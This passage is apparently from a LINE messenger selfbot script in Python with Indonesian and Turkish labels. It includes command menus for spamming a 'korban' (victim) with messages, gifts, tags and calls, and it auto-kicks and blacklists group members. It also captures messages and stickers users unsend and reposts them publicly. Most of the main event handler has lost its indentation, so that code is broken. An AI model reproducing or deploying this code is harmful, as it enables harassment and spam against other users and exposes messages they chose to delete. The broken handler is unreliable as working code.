        "╠❂➣ " + key + "Set sider:「Text」\n" + \
        "╠❂➣ " + key + "Set spam:「Text」\n" + \
        "╠❂➣ " + key + "Set pesan:「Text」\n" + \
        "╠❂➣ " + key + "Set respon:「Text」\n" + \
        "╠❂➣ " + key + "Set welcome:「Text」\n" + \
        "╠❂➣ " + key + "Set leave:「Text」\n" + \
        "╠❂➣ " + key + "Myname:「Nama」\n" + \
        "╠❂➣ " + key + "Bot1name:「Nama」\n" + \
        "╠❂➣ " + key + "Bot2name:「Nama」\n" + \
        "╠❂➣ " + key + "Bot1up「Kirim fotonya」\n" + \
        "╠❂➣ " + key + "Bot2up「Kirim fotonya」\n" + \
        "╠❂➣ " + key + "Gift:「Mid korban」「Jumlah」\n" + \
        "╠❂➣ " + key + "Spam:「Mid korban」「Jumlah」\n" + \
        "╠❂➣ " + key + "Spamtag:「jumlahnya」\n" + \
        "╠❂➣ " + key + "Spamtag「@」\n" + \
        "╠❂➣ " + key + "Spamcall:「jumlahnya」\n" + \
        "╠❂➣ " + key + "Spamcall\n" + \
        "╠❂➣ " + key + "Updatefoto\n" + \
        "╠❂➣ " + key + "Updategrup\n" + \
        "╠❂➣ " + key + "Updatebot\n" + \
        "╠❂➣ " + key + "Broadcast:「Text」\n" + \
        "╠❂➣ " + key + "Setkey「New Key」\n" + \
        "╠❂➣ " + key + "Mykey\n" + \
        "╠❂➣ " + key + "Resetkey\n" + \
        "╠❂➣ " + key + "Self「on/off」\n" + \
        "╠❂➣ " + key + "Hapus chat\n" + \
        "╠❂➣ " + key + "Remove chat\n" + \
        "╠❂➣ " + key + "Leave:「Namagrup」\n" + \
        "╠════════════════════╗" + "\n" + \
        " ◄]·✪·Kara liste·✪·[►" + "\n" + \
        "╠════════════════════╝" + "\n" + \
        "╠❂➣ " + key + "Blc\n" + \
        "╠❂➣ " + key + "Ban:on\n" + \
        "╠❂➣ " + key + "Unban:on\n" + \
        "╠❂➣ " + key + "Ban「@」\n" + \
        "╠❂➣ " + key + "Unban「@」\n" + \
        "╠❂➣ " + key + "Talkban「@」\n" + \
        "╠❂➣ " + key + "Untalkban「@」\n" + \
        "╠❂➣ " + key + "Talkban:on\n" + \
        "╠❂➣ " + key + "Untalkban:on\n" + \
        "╠❂➣ " + key + "Banlist\n" + \
        "╠❂➣ " + key + "Talkbanlist\n" + \
        "╠❂➣ " + key + "Clearban\n" + \
        "╠❂➣ " + key + "Refresh\n" + \
        "╠════════════════════╗" + "\n" + \
        " ◄]·✪ALBAYRAK✪·[►" + "\n" + \
        "╠════════════════════╝" + "\n" + \
        "╠════════════════════╗" + "\n" + \
        "◄]·✪line.me/ti/p/~adit_cmct✪·[►" + "\n" + \
        "╚════════════════════╝"
    return helpMessage1
def infomeme():
    """Return the chat help text listing the available meme templates.

    The text is a fixed banner plus the template names accepted by the
    ``Meme@<template>@<top>@<bottom>`` command, ending with a usage example.
    """
    # The literal is returned as-is; it is sent verbatim to the chat.
    return """
╔══════════════════════════════╗
 ◄]·✪SEAL TEAM✪·[►
╚══════════════════════════════╝
╔══════════════════════════════╗
 ◄]·✪·List Meme·✪·[►
╠══════════════════════════════╝
╠❂➣ Buzz
╠❂➣ Spongebob
╠❂➣ Patrick
╠❂➣ Doge
╠❂➣ Joker
╠❂➣ Xzibit
╠❂➣ You_tried
╠❂➣ cb
╠❂➣ blb
╠❂➣ wonka
╠❂➣ keanu
╠❂➣ cryingfloor
╠❂➣ disastergirl
╠❂➣ facepalm
╠❂➣ fwp
╠❂➣ grumpycat
╠❂➣ captain
╠❂➣ mmm
╠❂➣ rollsafe
╠❂➣ sad-obama
╠❂➣ sad-clinton
╠❂➣ aag
╠❂➣ sarcasticbear
╠❂➣ sk
╠❂➣ sparta
╠❂➣ sad
╠❂➣ contoh:
╠❂➣ Meme@buzz@lu tau?@gatau
╠══════════════════════════════╗
 ◄]·✪SEAL TEAM✪·[►
╠══════════════════════════════╝
╠══════════════════════════════╗
 ◄]·✪ALBAYRAK ✪·[►
╚══════════════════════════════╝
"""
def translate():
    """Return the chat help text for the auto-translate feature.

    Lists the ``Autotrans`` on/off toggle commands followed by the
    supported language codes in ``code : language`` form (these look like
    Google Translate language codes — TODO confirm against the Translator
    backend used elsewhere in this file).
    """
    # NOTE(review): this banner is sent verbatim to the chat; the
    # box-drawing characters and spacing are part of the output, so the
    # literal bytes below must not be altered.
    helpTranslate = "╔══════════════════════════════╗" + "\n" + \
    " 🍁🍁🍁 SEAL TEAM 🍁🍁🍁" + "\n" + \
    "╚══════════════════════════════╝" + "\n" + \
    "╔══════════════════════════════╗" + "\n" + \
    " ◄]·✪·ALBAYRAK·✪·[►" + "\n" + \
    "╠══════════════════════════════╝" + "\n" + \
    "╠❂➣ Autotrans「en-on/en-off」\n" + \
    "╠❂➣ Autotrans「id-on/id-off」\n" + \
    "╠❂➣ Autotrans「th-on/th-off」\n" + \
    "╠❂➣ Autotrans「tw-on/tw-off」\n" + \
    "╠❂➣ Autotrans「ar-on/ar-off」\n" + \
    "╠❂➣ af : afrikaans" + "\n" + \
    "╠❂➣ sq : albanian" + "\n" + \
    "╠❂➣ am : amharic" + "\n" + \
    "╠❂➣ ar : arabic" + "\n" + \
    "╠❂➣ hy : armenian" + "\n" + \
    "╠❂➣ az : azerbaijani" + "\n" + \
    "╠❂➣ eu : basque" + "\n" + \
    "╠❂➣ be : belarusian" + "\n" + \
    "╠❂➣ bn : bengali" + "\n" + \
    "╠❂➣ bs : bosnian" + "\n" + \
    "╠❂➣ bg : bulgarian" + "\n" + \
    "╠❂➣ ca : catalan" + "\n" + \
    "╠❂➣ ceb : cebuano" + "\n" + \
    "╠❂➣ ny : chichewa" + "\n" + \
    "╠❂➣ zh-cn : chinese (simplified)" + "\n" + \
    "╠❂➣ zh-tw : chinese (traditional)" + "\n" + \
    "╠❂➣ co : corsican" + "\n" + \
    "╠❂➣ hr : croatian" + "\n" + \
    "╠❂➣ cs : czech" + "\n" + \
    "╠❂➣ da : danish" + "\n" + \
    "╠❂➣ nl : dutch" + "\n" + \
    "╠❂➣ en : english" + "\n" + \
    "╠❂➣ eo : esperanto" + "\n" + \
    "╠❂➣ et : estonian" + "\n" + \
    "╠❂➣ tl : filipino" + "\n" + \
    "╠❂➣ fi : finnish" + "\n" + \
    "╠❂➣ fr : french" + "\n" + \
    "╠❂➣ fy : frisian" + "\n" + \
    "╠❂➣ gl : galician" + "\n" + \
    "╠❂➣ ka : georgian" + "\n" + \
    "╠❂➣ de : german" + "\n" + \
    "╠❂➣ el : greek" + "\n" + \
    "╠❂➣ gu : gujarati" + "\n" + \
    "╠❂➣ ht : haitian creole" + "\n" + \
    "╠❂➣ ha : hausa" + "\n" + \
    "╠❂➣ haw : hawaiian" + "\n" + \
    "╠❂➣ iw : hebrew" + "\n" + \
    "╠❂➣ hi : hindi" + "\n" + \
    "╠❂➣ hmn : hmong" + "\n" + \
    "╠❂➣ hu : hungarian" + "\n" + \
    "╠❂➣ is : icelandic" + "\n" + \
    "╠❂➣ ig : igbo" + "\n" + \
    "╠❂➣ id : indonesian" + "\n" + \
    "╠❂➣ ga : irish" + "\n" + \
    "╠❂➣ it : italian" + "\n" + \
    "╠❂➣ ja : japanese" + "\n" + \
    "╠❂➣ jw : javanese" + "\n" + \
    "╠❂➣ kn : kannada" + "\n" + \
    "╠❂➣ kk : kazakh" + "\n" + \
    "╠❂➣ km : khmer" + "\n" + \
    "╠❂➣ ko : korean" + "\n" + \
    "╠❂➣ ku : kurdish (kurmanji)" + "\n" + \
    "╠❂➣ ky : kyrgyz" + "\n" + \
    "╠❂➣ lo : lao" + "\n" + \
    "╠❂➣ la : latin" + "\n" + \
    "╠❂➣ lv : latvian" + "\n" + \
    "╠❂➣ lt : lithuanian" + "\n" + \
    "╠❂➣ lb : luxembourgish" + "\n" + \
    "╠❂➣ mk : macedonian" + "\n" + \
    "╠❂➣ mg : malagasy" + "\n" + \
    "╠❂➣ ms : malay" + "\n" + \
    "╠❂➣ ml : malayalam" + "\n" + \
    "╠❂➣ mt : maltese" + "\n" + \
    "╠❂➣ mi : maori" + "\n" + \
    "╠❂➣ mr : marathi" + "\n" + \
    "╠❂➣ mn : mongolian" + "\n" + \
    "╠❂➣ my : myanmar (burmese)" + "\n" + \
    "╠❂➣ ne : nepali" + "\n" + \
    "╠❂➣ no : norwegian" + "\n" + \
    "╠❂➣ ps : pashto" + "\n" + \
    "╠❂➣ fa : persian" + "\n" + \
    "╠❂➣ pl : polish" + "\n" + \
    "╠❂➣ pt : portuguese" + "\n" + \
    "╠❂➣ pa : punjabi" + "\n" + \
    "╠❂➣ ro : romanian" + "\n" + \
    "╠❂➣ ru : russian" + "\n" + \
    "╠❂➣ sm : samoan" + "\n" + \
    "╠❂➣ gd : scots gaelic" + "\n" + \
    "╠❂➣ sr : serbian" + "\n" + \
    "╠❂➣ st : sesotho" + "\n" + \
    "╠❂➣ sn : shona" + "\n" + \
    "╠❂➣ sd : sindhi" + "\n" + \
    "╠❂➣ si : sinhala" + "\n" + \
    "╠❂➣ sk : slovak" + "\n" + \
    "╠❂➣ sl : slovenian" + "\n" + \
    "╠❂➣ so : somali" + "\n" + \
    "╠❂➣ es : spanish" + "\n" + \
    "╠❂➣ su : sundanese" + "\n" + \
    "╠❂➣ sw : swahili" + "\n" + \
    "╠❂➣ sv : swedish" + "\n" + \
    "╠❂➣ tg : tajik" + "\n" + \
    "╠❂➣ ta : tamil" + "\n" + \
    "╠❂➣ te : telugu" + "\n" + \
    "╠❂➣ th : thai" + "\n" + \
    "╠❂➣ tr : turkish" + "\n" + \
    "╠❂➣ uk : ukrainian" + "\n" + \
    "╠❂➣ ur : urdu" + "\n" + \
    "╠❂➣ uz : uzbek" + "\n" + \
    "╠❂➣ vi : vietnamese" + "\n" + \
    "╠❂➣ cy : welsh" + "\n" + \
    "╠❂➣ xh : xhosa" + "\n" + \
    "╠❂➣ yi : yiddish" + "\n" + \
    "╠❂➣ yo : yoruba" + "\n" + \
    "╠❂➣ zu : zulu" + "\n" + \
    "╠❂➣ fil : Filipino" + "\n" + \
    "╠❂➣ he : Hebrew" + "\n" + \
    "╠══════════════════════════════╗" + "\n" + \
    " Contoh: SEAL TEAM" + "\n" + \
    "╠══════════════════════════════╝" + "\n" + \
    "╠══════════════════════════════╗" + "\n" + \
    "◄]·✪ ALBAYRAK ·[►" + "\n" + \
    "╚══════════════════════════════╝"
    return helpTranslate
def bot(op):
global time
global ast
global groupParam
try:
if op.type == 0:
return
if op.type == 11:
if op.param1 in protectqr:
try:
if aditmadzs.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
aditmadzs.reissueGroupTicket(op.param1)
X = aditmadzs.getGroup(op.param1)
X.preventedJoinByTicket = True
aditmadzs.updateGroup(X)
aditmadzs.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if ki.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventedJoinByTicket = True
ki.updateGroup(X)
aditmadzs.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
pass
if op.type == 13:
if mid in op.param3:
if wait["autoLeave"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
aditmadzs.acceptGroupInvitation(op.param1)
ginfo = aditmadzs.getGroup(op.param1)
aditmadzs.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
aditmadzs.leaveGroup(op.param1)
else:
aditmadzs.acceptGroupInvitation(op.param1)
ginfo = aditmadzs.getGroup(op.param1)
aditmadzs.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
aditmadzs.acceptGroupInvitation(op.param1)
ginfo = aditmadzs.getGroup(op.param1)
aditmadzs.sendMessage(op.param1,"Haii, salken yaa ^^")
else:
aditmadzs.acceptGroupInvitation(op.param1)
ginfo = aditmadzs.getGroup(op.param1)
aditmadzs.sendMessage(op.param1,"Haii, salken yaa ^^")
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
ki.leaveGroup(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if op.param1 in protectinvite:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
group = aditmadzs.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(op.param1,[_mid])
except:
try:
group = ki.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(op.param1,[_mid])
except:
pass
if op.type == 15:
if op.param1 in welcome:
if op.param2 in Bots:
pass
ginfo = aditmadzs.getGroup(op.param1)
contact = aditmadzs.getContact(op.param2).picturePath
image = 'http://dl.profile.line.naver.jp'+contact
leaveMembers(op.param1, [op.param2])
aditmadzs.sendImageWithURL(op.param1, image)
if op.type == 17:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 17:
if op.param1 in welcome:
if op.param2 in Bots:
pass
ginfo = aditmadzs.getGroup(op.param1)
contact = aditmadzs.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
welcomeMembers(op.param1, [op.param2])
aditmadzs.sendImageWithURL(op.param1, image)
if op.type == 17:
if op.param1 in protectjoin:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
if (wait["message"] in [" "," ","\n",None]):
pass
else:
aditmadzs.sendMessage(op.param1, wait["message"])
#===========ATMAK============#
if op.type == 19:
if op.param1 in protectkick:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
#===========İptal etmek============#
if op.type == 32:
if op.param1 in protectcancel:
if op.param3 in Bots:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
ki.findAndAddContactsByMid(op.param1,[Zmid])
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[Zmid])
except:
try:
if op.param3 not in wait["blacklist"]:
aditmadzs.findAndAddContactsByMid(op.param1,[Zmid])
aditmadzs.kickoutFromGroup(op.param1,[op.param2])
aditmadzs.inviteIntoGroup(op.param1,[Zmid])
except:
pass
return
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.inviteIntoGroup(op.param1,[op.param3])
aditmadzs.acceptGroupInvitation(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
aditmadzs.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.kickoutFromGroup(op.param1,[op.param2])
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
except:
pass
return
if Amid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
aditmadzs.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
aditmadzs.kickoutFromGroup(op.param1,[op.param2])
except:
try:
G = aditmadzs.getGroup(op.param1)
G.preventedJoinByTicket = False
aditmadzs.updateGroup(G)
Ticket = aditmadzs.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
aditmadzs.kickoutFromGroup(op.param1,[op.param2])
G = aditmadzs.getGroup(op.param1)
G.preventedJoinByTicket = True
aditmadzs.updateGroup(G)
Ticket = aditmadzs.reissueGroupTicket(op.param1)
except:
pass
return
if admin in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.findAndAddContactsByMid(op.param1,admin)
ki.inviteIntoGroup(op.param1,admin)
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
aditmadzs.findAndAddContactsByMid(op.param1,admin)
aditmadzs.inviteIntoGroup(op.param1,admin)
aditmadzs.kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if staff in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.findAndAddContactsByMid(op.param1,staff)
ki.inviteIntoGroup(op.param1,staff)
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
aditmadzs.findAndAddContactsByMid(op.param1,staff)
aditmadzs.inviteIntoGroup(op.param1,staff)
aditmadzs.kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 55:
try:
if op.param1 in Setmain["ADITMADZSreadPoint"]:
if op.param2 in Setmain["ADITMADZSreadMember"][op.param1]:
pass
else:
Setmain["ADITMADZSreadMember"][op.param1][op.param2] = True
else:
pass
except:
pass
if op.type == 55:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
Name = aditmadzs.getContact(op.param2).displayName
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n~ " + Name
siderMembers(op.param1, [op.param2])
contact = aditmadzs.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
aditmadzs.sendImageWithURL(op.param1, image)
if op.type == 65:
if wait["unsend"] == True:
try:
at = op.param1
msg_id = op.param2
if msg_id in msg_dict:
if msg_dict[msg_id]["from"]:
if msg_dict[msg_id]["text"] == 'Gambarnya dibawah':
ginfo = aditmadzs.getGroup(at)
Aditmadzs = aditmadzs.getContact(msg_dict[msg_id]["from"])
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Gambar Dihapus 」\n• Pengirim : "
ret_ = "• Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n• Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict[msg_id]["createdTime"])))
ry = str(Aditmadzs.displayName)
pesan = ''
pesan2 = pesan+"@x \n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':Aditmadzs.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
aditmadzs.sendMessage(at, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
aditmadzs.sendImage(at, msg_dict[msg_id]["data"])
else:
ginfo = aditmadzs.getGroup(at)
Aditmadzs = aditmadzs.getContact(msg_dict[msg_id]["from"])
ret_ = "「 Pesan Dihapus 」\n"
ret_ += "• Pengirim : {}".format(str(Aditmadzs.displayName))
ret_ += "\n• Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n• Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict[msg_id]["createdTime"])))
ret_ += "\n• Pesannya : {}".format(str(msg_dict[msg_id]["text"]))
aditmadzs.sendMessage(at, str(ret_))
del msg_dict[msg_id]
except Exception as e:
print(e)
if op.type == 65:
if wait["unsend"] == True:
try:
at = op.param1
msg_id = op.param2
if msg_id in msg_dict1:
if msg_dict1[msg_id]["from"]:
ginfo = aditmadzs.getGroup(at)
Aditmadzs = aditmadzs.getContact(msg_dict1[msg_id]["from"])
ret_ = "「 Sticker Dihapus 」\n"
ret_ += "• Pengirim : {}".format(str(Aditmadzs.displayName))
ret_ += "\n• Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n• Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict1[msg_id]["createdTime"])))
ret_ += "{}".format(str(msg_dict1[msg_id]["text"]))
aditmadzs.sendMessage(at, str(ret_))
aditmadzs.sendImage(at, msg_dict1[msg_id]["data"])
del msg_dict1[msg_id]
except Exception as e:
print(e)
if op.type == 26:
if wait["selfbot"] == True:
msg = op.message
if msg.to in simisimi:
try:
if msg.text is not None:
simi = msg.text
r = requests.get("http://corrykalam.pw/api/chatbot.php?text="+simi)
data = r.text
data = json.loads(data)
if data["status"] == 200:
aditmadzs.sendMessage(msg.to, str(data["answer"]))
except Exception as error:
pass
if msg.to in translateen:
try:
if msg.text is not None:
kata = msg.text
translator = Translator()
hasil = translator.translate(kata, dest='en')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
except Exception as error:
pass
if msg.to in translateid:
try:
if msg.text is not None:
kata = msg.text
translator = Translator()
hasil = translator.translate(kata, dest='id')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
except Exception as error:
pass
if msg.to in translateth:
try:
if msg.text is not None:
kata = msg.text
translator = Translator()
hasil = translator.translate(kata, dest='th')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
except Exception as error:
pass
if msg.to in translatetw:
try:
if msg.text is not None:
kata = msg.text
translator = Translator()
hasil = translator.translate(kata, dest='zh-tw')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
except Exception as error:
pass
if msg.to in translatear:
try:
if msg.text is not None:
kata = msg.text
translator = Translator()
hasil = translator.translate(kata, dest='ar')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
except Exception as error:
pass
if op.type == 25 or op.type == 26:
if wait["selfbot"] == True:
msg = op.message
if msg._from not in Bots:
if wait["talkban"] == True:
if msg._from in wait["Talkblacklist"]:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
aditmadzs.sendMessage(msg.to, wait["Respontag"])
aditmadzs.sendMessage(msg.to, None, contentMetadata={"STKID":"21715710","STKPKGID":"9662","STKVER":"2"}, contentType=7)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["Mentiongift"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
idth = ["a0768339-c2d3-4189-9653-2909e9bb6f58","ec4a14ea-7437-407b-aee7-96b1cbbc1b4b","f35bd31f-5ec7-4b2f-b659-92adf5e3d151","ba1d5150-3b5f-4768-9197-01a3f971aa34","2b4ccc45-7309-47fe-a006-1a1edb846ddb","168d03c3-dbc2-456f-b982-3d6f85f52af2","d4f09a5f-29df-48ac-bca6-a204121ea165","517174f2-1545-43b9-a28f-5777154045a6","762ecc71-7f71-4900-91c9-4b3f213d8b26","2df50b22-112d-4f21-b856-f88df2193f9e"]
plihth = random.choice(idth)
jenis = ["5","6","7","8"]
plihjenis = random.choice(jenis)
aditmadzs.sendMessage(msg.to, "Yang suka ngetag minta di gift yaa!?\nCek di chat, udah aku gift tuh...")
aditmadzs.sendMessage(msg._from, None, contentMetadata={"PRDID":plihth,"PRDTYPE":"THEME","MSGTPL":plihjenis}, contentType=9)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["Mentionkick"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
aditmadzs.sendMessage(msg.to, "Jangan tag saya....")
aditmadzs.kickoutFromGroup(msg.to, [msg._from])
break
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
aditmadzs.sendMessage(msg.to,"「Cek ID Sticker」\n🐚 STKID : " + msg.contentMetadata["STKID"] + "\n⏩ STKPKGID : " + msg.contentMetadata["STKPKGID"] + "\n⏩ STKVER : " + msg.contentMetadata["STKVER"]+ "\n\n「Link Sticker」" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
aditmadzs.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = aditmadzs.getContact(msg.contentMetadata["mid"])
path = aditmadzs.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
aditmadzs.sendMessage(msg.to,"⏩ Nama : " + msg.contentMetadata["displayName"] + "\n⏩ MID : " + msg.contentMetadata["mid"] + "\n⏩ Status : " + contact.statusMessage + "\n⏩ Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
aditmadzs.sendImageWithURL(msg.to, image)
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.contentType == 0:
msg_dict[msg.id] = {"text":msg.text,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 1:
path = aditmadzs.downloadObjectMsg(msg_id)
msg_dict[msg.id] = {"text":'Gambarnya dibawah',"data":path,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 7:
stk_id = msg.contentMetadata["STKID"]
stk_ver = msg.contentMetadata["STKVER"]
pkg_id = msg.contentMetadata["STKPKGID"]
ret_ = "\n\n「 Sticker Info 」"
ret_ += "\n• Sticker ID : {}".format(stk_id)
ret_ += "\n• Sticker Version : {}".format(stk_ver)
ret_ += "\n• Sticker Package : {}".format(pkg_id)
ret_ += "\n• Sticker Url : line://shop/detail/{}".format(pkg_id)
query = int(stk_id)
if type(query) == int:
data = 'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(query)+'/ANDROID/sticker.png'
path = aditmadzs.downloadFileURL(data)
msg_dict1[msg.id] = {"text":str(ret_),"data":path,"from":msg._from,"createdTime":msg.createdTime}
if msg.toType == 0 or msg.toType == 2:
if msg.toType == 0:
to = receiver
elif msg.toType == 2:
to = receiver
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
aditmadzs.sendMessage(msg.to,"STKID : " + msg.contentMetadata["STKID"] + "\nSTKPKGID : " + msg.contentMetadata["STKPKGID"] + "\nSTKVER : " + msg.contentMetadata["STKVER"]+ "\n\n「Link Sticker」" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
aditmadzs.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = aditmadzs.getContact(msg.contentMetadata["mid"])
path = aditmadzs.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
aditmadzs.sendMessage(msg.to,"⏩ Nama : " + msg.contentMetadata["displayName"] + "\n⏩ MID : " + msg.contentMetadata["mid"] + "\n⏩ Status : " + contact.statusMessage + "\n⏩ Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
aditmadzs.sendImageWithURL(msg.to, image)
#===========EKLE BOT============#
if msg.contentType == 13:
if msg._from in admin:
if wait["addbots"] == True:
if msg.contentMetadata["mid"] in Bots:
aditmadzs.sendMessage(msg.to,"Contact itu sudah jadi anggota bot")
wait["addbots"] = True
else:
Bots.append(msg.contentMetadata["mid"])
wait["addbots"] = True
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan ke anggota bot")
if wait["dellbots"] == True:
if msg.contentMetadata["mid"] in Bots:
Bots.remove(msg.contentMetadata["mid"])
aditmadzs.sendMessage(msg.to,"Berhasil menghapus dari anggota bot")
else:
wait["dellbots"] = True
aditmadzs.sendMessage(msg.to,"Contact itu bukan anggota Aditmadzs BOT")
#===========PERSONEL EKLE============#
if msg._from in admin:
if wait["addstaff"] == True:
if msg.contentMetadata["mid"] in staff:
aditmadzs.sendMessage(msg.to,"Contact itu sudah jadi staff")
wait["addstaff"] = True
else:
staff.append(msg.contentMetadata["mid"])
wait["addstaff"] = True
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan ke staff")
if wait["dellstaff"] == True:
if msg.contentMetadata["mid"] in staff:
staff.remove(msg.contentMetadata["mid"])
aditmadzs.sendMessage(msg.to,"Berhasil menghapus dari staff")
wait["dellstaff"] = True
else:
wait["dellstaff"] = True
aditmadzs.sendMessage(msg.to,"Contact itu bukan staff")
#===========ADD ADMIN============#
if msg._from in admin:
if wait["addadmin"] == True:
if msg.contentMetadata["mid"] in admin:
